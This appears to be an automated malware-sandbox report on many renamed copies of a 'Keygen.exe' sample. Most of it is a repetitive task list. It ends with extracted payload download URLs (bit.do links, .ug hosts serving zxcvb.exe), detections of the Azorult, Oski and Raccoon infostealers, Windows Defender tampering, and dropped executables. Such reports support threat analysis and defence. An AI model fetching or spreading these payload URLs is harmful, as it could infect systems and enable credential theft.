201001-nyhbt4p25j_pw_infected/Keygen — копия (25) — копия.exe
Resource
win7
Behavioral task
behavioral130
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25) — копия.exe
Resource
win10v200722
Behavioral task
behavioral131
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25).exe
Resource
win7v200722
Behavioral task
behavioral132
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25).exe
Resource
win10v200722
Behavioral task
behavioral133
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26) — копия.exe
Resource
win7v200722
Behavioral task
behavioral134
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26) — копия.exe
Resource
win10
Behavioral task
behavioral135
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26).exe
Resource
win7
Behavioral task
behavioral136
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26).exe
Resource
win10
Behavioral task
behavioral137
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27) — копия.exe
Resource
win7
Behavioral task
behavioral138
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27) — копия.exe
Resource
win10v200722
Behavioral task
behavioral139
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27).exe
Resource
win7
Behavioral task
behavioral140
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27).exe
Resource
win10v200722
Behavioral task
behavioral141
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28) — копия.exe
Resource
win7
Behavioral task
behavioral142
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28) — копия.exe
Resource
win10v200722
Behavioral task
behavioral143
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28).exe
Resource
win7
Behavioral task
behavioral144
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28).exe
Resource
win10v200722
Behavioral task
behavioral145
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29) — копия.exe
Resource
win7
Behavioral task
behavioral146
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29) — копия.exe
Resource
win10v200722
Behavioral task
behavioral147
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29).exe
Resource
win7
Behavioral task
behavioral148
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29).exe
Resource
win10v200722
Behavioral task
behavioral149
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3) — копия.exe
Resource
win7v200722
Behavioral task
behavioral150
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3) — копия.exe
Resource
win10
Behavioral task
behavioral151
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3).exe
Resource
win7
Behavioral task
behavioral152
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3).exe
Resource
win10
Behavioral task
behavioral153
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30) — копия.exe
Resource
win7
Behavioral task
behavioral154
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30) — копия.exe
Resource
win10
Behavioral task
behavioral155
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe
Resource
win7v200722
Behavioral task
behavioral156
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe
Resource
win10
Behavioral task
behavioral157
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31) — копия.exe
Resource
win7v200722
Behavioral task
behavioral158
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31) — копия.exe
Resource
win10
Behavioral task
behavioral159
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31).exe
Resource
win7v200722
Behavioral task
behavioral160
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31).exe
Resource
win10v200722
Behavioral task
behavioral161
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32) — копия.exe
Resource
win7
Behavioral task
behavioral162
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32) — копия.exe
Resource
win10
Behavioral task
behavioral163
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe
Resource
win7
Behavioral task
behavioral164
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe
Resource
win10
Behavioral task
behavioral165
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33) — копия.exe
Resource
win7
Behavioral task
behavioral166
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33) — копия.exe
Resource
win10v200722
Behavioral task
behavioral167
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33).exe
Resource
win7
Behavioral task
behavioral168
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33).exe
Resource
win10
Behavioral task
behavioral169
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34) — копия.exe
Resource
win7v200722
Behavioral task
behavioral170
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34) — копия.exe
Resource
win10v200722
Behavioral task
behavioral171
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34).exe
Resource
win7v200722
Behavioral task
behavioral172
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34).exe
Resource
win10v200722
Behavioral task
behavioral173
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35) — копия.exe
Resource
win7v200722
Behavioral task
behavioral174
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35) — копия.exe
Resource
win10v200722
Behavioral task
behavioral175
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35).exe
Resource
win7v200722
Behavioral task
behavioral176
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35).exe
Resource
win10v200722
Behavioral task
behavioral177
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36) — копия.exe
Resource
win7v200722
Behavioral task
behavioral178
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36) — копия.exe
Resource
win10v200722
Behavioral task
behavioral179
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36).exe
Resource
win7v200722
Behavioral task
behavioral180
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36).exe
Resource
win10v200722
Behavioral task
behavioral181
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37) — копия.exe
Resource
win7v200722
Behavioral task
behavioral182
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37) — копия.exe
Resource
win10v200722
Behavioral task
behavioral183
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37).exe
Resource
win7v200722
Behavioral task
behavioral184
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37).exe
Resource
win10v200722
Behavioral task
behavioral185
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38) — копия.exe
Resource
win7v200722
Behavioral task
behavioral186
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38) — копия.exe
Resource
win10
Behavioral task
behavioral187
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38).exe
Resource
win7
Behavioral task
behavioral188
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38).exe
Resource
win10
Behavioral task
behavioral189
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (39) — копия.exe
Resource
win7v200722
Behavioral task
behavioral190
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (39) — копия.exe
Resource
win10
Behavioral task
behavioral191
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4) — копия.exe
Resource
win7v200722
Behavioral task
behavioral192
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4) — копия.exe
Resource
win10
Behavioral task
behavioral193
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4).exe
Resource
win7
Behavioral task
behavioral194
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4).exe
Resource
win10
Behavioral task
behavioral195
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (40) — копия.exe
Resource
win7
Behavioral task
behavioral196
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (40) — копия.exe
Resource
win10
Behavioral task
behavioral197
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (41) — копия.exe
Resource
win7
Behavioral task
behavioral198
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (41) — копия.exe
Resource
win10
Behavioral task
behavioral199
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (42) — копия.exe
Resource
win7v200722
Behavioral task
behavioral200
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (42) — копия.exe
Resource
win10
Behavioral task
behavioral201
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (43) — копия.exe
Resource
win7
Behavioral task
behavioral202
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (43) — копия.exe
Resource
win10
Behavioral task
behavioral203
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (44) — копия.exe
Resource
win7v200722
Behavioral task
behavioral204
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (44) — копия.exe
Resource
win10
Behavioral task
behavioral205
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (45) — копия.exe
Resource
win7v200722
Behavioral task
behavioral206
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (45) — копия.exe
Resource
win10v200722
Behavioral task
behavioral207
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (46) — копия.exe
Resource
win7v200722
Behavioral task
behavioral208
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (46) — копия.exe
Resource
win10v200722
Behavioral task
behavioral209
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (47) — копия.exe
Resource
win7
Behavioral task
behavioral210
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (47) — копия.exe
Resource
win10
Behavioral task
behavioral211
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (48) — копия.exe
Resource
win7v200722
Behavioral task
behavioral212
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (48) — копия.exe
Resource
win10
Behavioral task
behavioral213
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (49) — копия.exe
Resource
win7v200722
Behavioral task
behavioral214
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (49) — копия.exe
Resource
win10
Behavioral task
behavioral215
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe
Resource
win7v200722
Behavioral task
behavioral216
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe
Resource
win10
Behavioral task
behavioral217
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe
Resource
win7v200722
Behavioral task
behavioral218
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe
Resource
win10
Behavioral task
behavioral219
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (50) — копия.exe
Resource
win7v200722
Behavioral task
behavioral220
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (50) — копия.exe
Resource
win10
Behavioral task
behavioral221
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (51) — копия.exe
Resource
win7
Behavioral task
behavioral222
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (51) — копия.exe
Resource
win10
Behavioral task
behavioral223
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (52) — копия.exe
Resource
win7v200722
Behavioral task
behavioral224
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (52) — копия.exe
Resource
win10v200722
Behavioral task
behavioral225
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (53) — копия.exe
Resource
win7v200722
Behavioral task
behavioral226
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (53) — копия.exe
Resource
win10v200722
Behavioral task
behavioral227
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (54) — копия.exe
Resource
win7v200722
Behavioral task
behavioral228
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (54) — копия.exe
Resource
win10v200722
Behavioral task
behavioral229
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (55) — копия.exe
Resource
win7
Behavioral task
behavioral230
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (55) — копия.exe
Resource
win10v200722
Behavioral task
behavioral231
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (56) — копия.exe
Resource
win7v200722
Behavioral task
behavioral232
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (56) — копия.exe
Resource
win10v200722
Behavioral task
behavioral233
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (57) — копия.exe
Resource
win7v200722
Behavioral task
behavioral234
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (57) — копия.exe
Resource
win10v200722
Behavioral task
behavioral235
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (58) — копия.exe
Resource
win7v200722
Behavioral task
behavioral236
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (58) — копия.exe
Resource
win10v200722
Behavioral task
behavioral237
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (59) — копия.exe
Resource
win7v200722
Behavioral task
behavioral238
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (59) — копия.exe
Resource
win10v200722
Behavioral task
behavioral239
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6) — копия.exe
Resource
win7v200722
Behavioral task
behavioral240
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6) — копия.exe
Resource
win10v200722
Behavioral task
behavioral241
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6).exe
Resource
win7v200722
Behavioral task
behavioral242
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6).exe
Resource
win10v200722
Behavioral task
behavioral243
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (60) — копия.exe
Resource
win7v200722
Behavioral task
behavioral244
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (60) — копия.exe
Resource
win10v200722
Behavioral task
behavioral245
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (61) — копия.exe
Resource
win7
Behavioral task
behavioral246
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (61) — копия.exe
Resource
win10
Behavioral task
behavioral247
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (62) — копия.exe
Resource
win7
Behavioral task
behavioral248
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (62) — копия.exe
Resource
win10
Behavioral task
behavioral249
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe
Resource
win7
Behavioral task
behavioral250
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe
Resource
win10
Behavioral task
behavioral251
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (64) — копия.exe
Resource
win7
Behavioral task
behavioral252
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (64) — копия.exe
Resource
win10v200722
Behavioral task
behavioral253
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (65) — копия.exe
Resource
win7
Behavioral task
behavioral254
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (65) — копия.exe
Resource
win10
Behavioral task
behavioral255
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (66) — копия.exe
Resource
win7
Behavioral task
behavioral256
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (66) — копия.exe
Resource
win10
Behavioral task
behavioral257
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (67) — копия.exe
Resource
win7
Behavioral task
behavioral258
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (67) — копия.exe
Resource
win10
Behavioral task
behavioral259
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (68) — копия.exe
Resource
win7
Behavioral task
behavioral260
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (68) — копия.exe
Resource
win10
Behavioral task
behavioral261
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (69) — копия.exe
Resource
win7
Behavioral task
behavioral262
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (69) — копия.exe
Resource
win10
Behavioral task
behavioral263
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7) — копия.exe
Resource
win7
Behavioral task
behavioral264
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7) — копия.exe
Resource
win10
Behavioral task
behavioral265
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7).exe
Resource
win7v200722
Behavioral task
behavioral266
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7).exe
Resource
win10v200722
Behavioral task
behavioral267
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (70) — копия.exe
Resource
win7v200722
Behavioral task
behavioral268
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (70) — копия.exe
Resource
win10
Behavioral task
behavioral269
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (71) — копия.exe
Resource
win7
Behavioral task
behavioral270
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (71) — копия.exe
Resource
win10
Behavioral task
behavioral271
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (72) — копия.exe
Resource
win7
Behavioral task
behavioral272
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (72) — копия.exe
Resource
win10v200722
Behavioral task
behavioral273
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (73) — копия.exe
Resource
win7
Behavioral task
behavioral274
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (73) — копия.exe
Resource
win10v200722
Behavioral task
behavioral275
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (74) — копия.exe
Resource
win7
Behavioral task
behavioral276
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (74) — копия.exe
Resource
win10
Behavioral task
behavioral277
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (75) — копия.exe
Resource
win7v200722
Behavioral task
behavioral278
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (75) — копия.exe
Resource
win10
Behavioral task
behavioral279
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (76) — копия.exe
Resource
win7v200722
Behavioral task
behavioral280
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (76) — копия.exe
Resource
win10
Behavioral task
behavioral281
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (77) — копия.exe
Resource
win7v200722
Behavioral task
behavioral282
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (77) — копия.exe
Resource
win10
Behavioral task
behavioral283
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (78) — копия.exe
Resource
win7v200722
Behavioral task
behavioral284
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (78) — копия.exe
Resource
win10
Behavioral task
behavioral285
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (79) — копия.exe
Resource
win7v200722
Behavioral task
behavioral286
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (79) — копия.exe
Resource
win10
Behavioral task
behavioral287
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8) — копия.exe
Resource
win7v200722
Behavioral task
behavioral288
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8) — копия.exe
Resource
win10v200722
Behavioral task
behavioral289
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8).exe
Resource
win7v200722
Behavioral task
behavioral290
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8).exe
Resource
win10v200722
Behavioral task
behavioral291
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (80) — копия.exe
Resource
win7v200722
Behavioral task
behavioral292
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (80) — копия.exe
Resource
win10
Behavioral task
behavioral293
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe
Resource
win7v200722
Behavioral task
behavioral294
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe
Resource
win10v200722
Behavioral task
behavioral295
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (82) — копия.exe
Resource
win7v200722
Behavioral task
behavioral296
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (82) — копия.exe
Resource
win10
Behavioral task
behavioral297
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (83) — копия.exe
Resource
win7
Behavioral task
behavioral298
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (83) — копия.exe
Resource
win10v200722
Behavioral task
behavioral299
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (84) — копия.exe
Resource
win7v200722
Behavioral task
behavioral300
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (84) — копия.exe
Resource
win10
Behavioral task
behavioral301
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (85) — копия.exe
Resource
win7
Behavioral task
behavioral302
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (85) — копия.exe
Resource
win10v200722
Behavioral task
behavioral303
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (86) — копия.exe
Resource
win7
Behavioral task
behavioral304
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (86) — копия.exe
Resource
win10v200722
Behavioral task
behavioral305
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (87) — копия.exe
Resource
win7v200722
Behavioral task
behavioral306
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (87) — копия.exe
Resource
win10v200722
Behavioral task
behavioral307
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (88) — копия.exe
Resource
win7
Behavioral task
behavioral308
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (88) — копия.exe
Resource
win10
Behavioral task
behavioral309
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (89) — копия.exe
Resource
win7
Behavioral task
behavioral310
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (89) — копия.exe
Resource
win10v200722
Behavioral task
behavioral311
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9) — копия.exe
Resource
win7
Behavioral task
behavioral312
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9) — копия.exe
Resource
win10v200722
Behavioral task
behavioral313
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe
Resource
win7v200722
Behavioral task
behavioral314
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe
Resource
win10
Behavioral task
behavioral315
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (90) — копия.exe
Resource
win7
Behavioral task
behavioral316
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (90) — копия.exe
Resource
win10
Behavioral task
behavioral317
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (91) — копия.exe
Resource
win7v200722
Behavioral task
behavioral318
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (91) — копия.exe
Resource
win10v200722
Behavioral task
behavioral319
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (92) — копия.exe
Resource
win7v200722
Behavioral task
behavioral320
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (92) — копия.exe
Resource
win10
Behavioral task
behavioral321
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (93) — копия.exe
Resource
win7v200722
Behavioral task
behavioral322
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (93) — копия.exe
Resource
win10v200722
Behavioral task
behavioral323
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (94) — копия.exe
Resource
win7v200722
Behavioral task
behavioral324
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (94) — копия.exe
Resource
win10v200722
Behavioral task
behavioral325
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (95) — копия.exe
Resource
win7
Behavioral task
behavioral326
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (95) — копия.exe
Resource
win10
Behavioral task
behavioral327
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (96) — копия.exe
Resource
win7
Behavioral task
behavioral328
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (96) — копия.exe
Resource
win10
Behavioral task
behavioral329
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (97) — копия.exe
Resource
win7
Behavioral task
behavioral330
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (97) — копия.exe
Resource
win10
Behavioral task
behavioral331
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (98) — копия.exe
Resource
win7v200722
Behavioral task
behavioral332
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (98) — копия.exe
Resource
win10
Behavioral task
behavioral333
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (99) — копия.exe
Resource
win7
Behavioral task
behavioral334
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (99) — копия.exe
Resource
win10v200722
Behavioral task
behavioral335
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe
Resource
win7v200722
Behavioral task
behavioral336
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe
Resource
win10v200722
Behavioral task
behavioral337
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (3).exe
Resource
win7
Behavioral task
behavioral338
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (3).exe
Resource
win10v200722
Behavioral task
behavioral339
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (4).exe
Resource
win7v200722
Behavioral task
behavioral340
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (4).exe
Resource
win10
Behavioral task
behavioral341
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия.exe
Resource
win7
Behavioral task
behavioral342
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия.exe
Resource
win10v200722
Behavioral task
behavioral343
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия.exe
Resource
win7
Behavioral task
behavioral344
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия.exe
Resource
win10
Behavioral task
behavioral345
Sample
201001-nyhbt4p25j_pw_infected/Keygen.exe
Resource
win7v200722
Behavioral task
behavioral346
Sample
201001-nyhbt4p25j_pw_infected/Keygen.exe
Resource
win10v200722
General
-
Target
201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe
Malware Config
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
C:\Users\Admin\AppData\LocalLow\machineinfo.txt
raccoon
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 4 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral314/memory/3672-306-0x000000000AF10000-0x000000000AF15000-memory.dmp disable_win_def behavioral314/memory/3800-318-0x0000000004BB0000-0x0000000004BB3000-memory.dmp disable_win_def C:\Windows\Temp\jvidz5ty.exe disable_win_def C:\Windows\temp\jvidz5ty.exe disable_win_def -
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon log file 1 IoCs
Detects a log file produced by the Raccoon Stealer.
Processes:
yara_rule raccoon_log_file -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 8 1116 powershell.exe 11 1116 powershell.exe 12 2184 powershell.exe 14 2184 powershell.exe 15 4332 powershell.exe 17 4332 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
Processes:
Keygen.exeuzp.exeqra.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeqra.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exetql.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exetql.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeuzp.exehgfnmbasdo.exehgfnmbasdo.exehgfnmbasdo.exeaxcsdfa.exeaxcsdfa.exeNZV2kyGkCX.exeYNZNZpqUlS.exen4Gu4e8lzY.exe1sKivn9gpS.exejvidz5ty.exepid process 2108 Keygen.exe 4888 uzp.exe 4968 qra.exe 5048 FVjhgtresfdbv.exe 5064 NHtrdsaghfDF.exe 4128 qra.exe 4172 NHtrdsaghfDF.exe 4192 FVjhgtresfdbv.exe 1056 tql.exe 4696 FVjhgtresfdbv.exe 4700 NHtrdsaghfDF.exe 4672 tql.exe 3912 NHtrdsaghfDF.exe 4780 FVjhgtresfdbv.exe 2476 uzp.exe 3012 hgfnmbasdo.exe 4768 hgfnmbasdo.exe 3840 hgfnmbasdo.exe 2812 axcsdfa.exe 4820 axcsdfa.exe 4560 NZV2kyGkCX.exe 4760 YNZNZpqUlS.exe 3672 n4Gu4e8lzY.exe 3800 1sKivn9gpS.exe 4704 jvidz5ty.exe -
Loads dropped DLL 17 IoCs
Processes:
FVjhgtresfdbv.exeFVjhgtresfdbv.exehgfnmbasdo.exeqra.exepid process 4192 FVjhgtresfdbv.exe 4192 FVjhgtresfdbv.exe 4192 FVjhgtresfdbv.exe 4780 FVjhgtresfdbv.exe 4780 FVjhgtresfdbv.exe 4780 FVjhgtresfdbv.exe 3840 hgfnmbasdo.exe 3840 hgfnmbasdo.exe 3840 hgfnmbasdo.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe 4128 qra.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
